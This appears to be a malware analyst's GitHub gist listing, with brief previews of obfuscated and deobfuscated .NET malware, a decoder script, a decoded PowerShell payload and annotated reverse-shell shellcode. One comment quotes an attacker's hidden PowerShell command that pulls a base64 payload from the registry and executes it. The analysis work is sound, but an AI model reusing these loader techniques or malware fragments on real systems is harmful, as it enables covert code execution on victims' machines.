jdferrell3
jdferrell3
/ passthru.cs
Last active
October 4, 2017 20:29
Simple C# code to execute another application
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| namespace passthru | |
| { | |
| class Program | |
| { |
jdferrell3
/ dotnet_malware_article_obfuscated_full.cs
Last active
March 9, 2018 02:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| private static void pwS3x7Sg(string[] HA36XMPY) | |
| { | |
| int num = 5; | |
| string text; | |
| string a; | |
| string location; | |
| byte[] xnnXVZCo; | |
| Assembly assembly; | |
| string a2; | |
| for (;;) |
jdferrell3
/ dotnet_malware_article_obfuscated_partial.cs
Last active
March 9, 2018 02:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| private static void pwS3x7Sg(string[] HA36XMPY) | |
| { | |
| int num = 5; | |
| string text; | |
| string a; | |
| string location; | |
| byte[] xnnXVZCo; | |
| Assembly assembly; | |
| string a2; | |
| for (;;) |
jdferrell3
/ dotnet_malware_article_deobfuscated.cs
Last active
March 9, 2018 03:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| private static void pwS3x7Sg(string[] args) { | |
| Assembly executingAssembly = Assembly.GetExecutingAssembly(); | |
| byte[] xnnXVZCo = rYChEj24.m861PYDG(executingAssembly); | |
| byte[] xnnXVZCo2 = rYChEj24.Q8sHxNtH(executingAssembly); | |
| Assembly assembly = Assembly.Load(rYChEj24.ygv4ageb(xnnXVZCo2)); | |
| string a = DFsEYbtO.smethod_1(293); | |
| string a2 = DFsEYbtO.smethod_1(302); | |
| string location = Assembly.GetEntryAssembly().Location; | |
| string text = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + DFsEYbtO.smethod_1(311) + Path.GetFileName(location); | |
| if (a2 == DFsEYbtO.smethod_1(316) && !File.Exists(text)) { |
jdferrell3
/ dotnet_malware_article_convert_resource.cs
Created
March 9, 2018 02:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| static void Main() | |
| { | |
| try | |
| { | |
| //IntPtr fResource = FindResource(new IntPtr(0), new IntPtr(130), new IntPtr(23)); | |
| //uint sResource = SizeofResource(new IntPtr(0), fResource); | |
| //IntPtr lResource = LoadResource(new IntPtr(0), fResource); | |
| //IntPtr dResource = LockResource(lResource); | |
| //CtNmG = new byte[sResource]; |
jdferrell3
/ dotnet_malware_article_decode.py
Created
June 6, 2018 16:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| encoded_datastring = "pvlkb%V|vq`h>\b\u000fpvlkb%V|vq`h+LJ>\b\u000fpvlkb%V|vq`h+Q`}q>\b\u000fpvlkb%V|vq`h+W`ci`fqljk>\b\u000fpvlkb%V|vq`h+Qmw`dalkb>\b\u000fpvlkb%V|vq`h+Wpkqlh`+Lkq`wjuV`wslf`v>\b\u000fpvlkb%V|vq`h+Awdrlkb>\b\u000f\b\u000fkdh`vudf`%HBfrR}vhhbK_\b\u000f~\b\u000f\fupgilf%fidvv%lAu}~upgilf%sjla%wGKc-,~\b\u000fvmjwq%Mh|p%8%(43457>%\u000f%g|q`^X%Mh|pMh|p%8%V|vq`h+LJ+Cli`+W`daDiiG|q`v-'Mh|p',>cijdq%FpJF%8%6+017104@(5<C>%\u000fvmjwq%`rsV%8%44270>%\u000f%g|q`^X%`rsV`rsV%8%V|vq`h+LJ+Cli`+W`daDiiG|q`v-'`rsV',>pijkb%nhgG%8%47=7=32151133040<>%\u000f\b\u000fxupgilf%sjla%|fB@-,~\b\u000flkq%U_rI%8%176<=0>%\u000frmli`-U_rI%88%176<=0,~\b\u000fU_rI%8%U_rI%.%702154>\b\u000fxijkb%SbNm%8%4<74=04541520<522>%\u000flkq%VrnW%8%31445=22>%\u000flc-VrnW%88%45272<,~\b\u000fVrnW%8%VrnW%.%713440>\b\u000fxvqwlkb%rLBA%8%'IjcP'>%\u000f%Fjkvji`+Rwlq`Ilk`-rLBA,>\b\u000fxupgilf%sjla%QNFF-,~\b\u000fijkb%U@WV%8%3573524<6<<5265<=>%\u000fvmjwq%|]qt%8%421<7>%\u000f%g|q`^X%|]qt|]qt%8%V|vq`h+LJ+Cli`+W`daDiiG|q`v-'|]qt',>pijkb%FfQs%8%24< |
jdferrell3
/ dotnet_malware_article_decoded.cs
Created
June 6, 2018 16:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.Reflection; | |
| using System.Threading; |
jdferrell3
/ powershell_payload_decoded.ps1
Last active
August 7, 2020 06:33
powershell payload decoded
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Formatting tweaked for readablity as an embedded gist, will not execute | |
| # commented as well | |
| Set-StrictMode -Version 2 | |
| $DoIt = @' | |
| function func_get_proc_address { | |
| Param ($var_module, $var_procedure) | |
| $var_unsafe_native_methods = ( | |
| [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { |
jdferrell3
/ powershell_payload_shellcode.asm
Last active
January 17, 2024 14:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; shellcode found on Windows host. Payload was stored in the registry. Powershell | |
| ; was used to extract it from the registry and execute it: | |
| ; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \ | |
| ; hidden -c "$val = (gp HKLM:SOFTWARE\'').''; \ | |
| ; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d" | |
| ; The following references were used to help comment the shellcode | |
| ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm | |
| ; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import gzip | |
| import base64 | |
| import StringIO | |
| # python bgzip.py | |
| # H4sIAErhF1wC/8tIzcnJBwCGphA2BQAAAA== | |
| # hello | |
| def gzip_and_base64(s): | |
| out = StringIO.StringIO() |
OlderNewer